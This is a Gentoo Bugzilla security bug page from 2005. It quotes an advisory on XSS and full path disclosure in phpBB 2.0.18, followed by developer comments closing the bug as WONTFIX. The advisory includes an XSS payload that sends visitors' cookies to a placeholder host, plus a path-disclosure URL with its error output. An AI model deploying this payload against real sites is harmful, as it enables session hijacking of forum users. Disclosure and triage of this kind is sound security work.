Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bugzilla DB migration completed. Please report issues to Infra team via email via infra@gentoo.org or IRC
Bug 115908 - www-apps/phpBB Possible several issues
Summary: www-apps/phpBB Possible several issues
Status: RESOLVED WONTFIX
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High trivial (vote)
Assignee: Gentoo Security
URL: http://archives.neohapsis.com/archive...
Whiteboard: ~4 [?]
Keywords:
Depends on:
Blocks:
 
Reported: 2005-12-17 23:11 UTC by Sune Kloppenborg Jeppesen
Modified: 2006-01-03 03:12 UTC (History)
2 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen gentoo-dev 2005-12-17 23:11:44 UTC
Filing this for the forum devs.

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

--- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, simple and
straightforward administration panel, and helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact with author http://www.phpbb.com/about.php.

--- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile
"Always allow HTML: YES" or are you Guest

that you can use this tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">"
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X="<B "> H A L O </B>

and have you cookies.

--- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

-25-31---
if( !empty($setmodules) )
{
        $filename = basename(__FILE__);
        $module['Users']['Disallow'] = append_sid($filename);

        return;
}
-25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

-RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
-RESULT ERROR---
Comment 1 Tom Knight (RETIRED) gentoo-dev 2005-12-18 02:20:21 UTC
Our forums aren't affected by this as we have both HTML and register_globals switched off.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2005-12-18 03:06:05 UTC
This looks very limited.
- XSS if Allowed HTML tags is set to "ON"
- Path disclosure if PHP has register_globals = On and display_errors = On

Those are non-standard settings... Closing this one, feel free to reopen if phpBB releases a new version.
Comment 3 Jakub Moc (RETIRED) gentoo-dev 2006-01-03 02:12:28 UTC
*** Bug 117560 has been marked as a duplicate of this bug. ***
Comment 4 Jakub Moc (RETIRED) gentoo-dev 2006-01-03 02:13:15 UTC
2.0.19 is out, if you want to revisit this.
Comment 5 Thierry Carrez (RETIRED) gentoo-dev 2006-01-03 02:29:30 UTC
Well, phpBB is still security-masked as a semi-permanent security PITA so no, I don't want to revisit this. However www-apps can still bump it to 2.0.19 if they want to, since lots of users security_unmask the thing and accept the risk.
Comment 6 Renat Lumpau (RETIRED) gentoo-dev 2006-01-03 03:12:14 UTC
2.0.19 in CVS, just FYI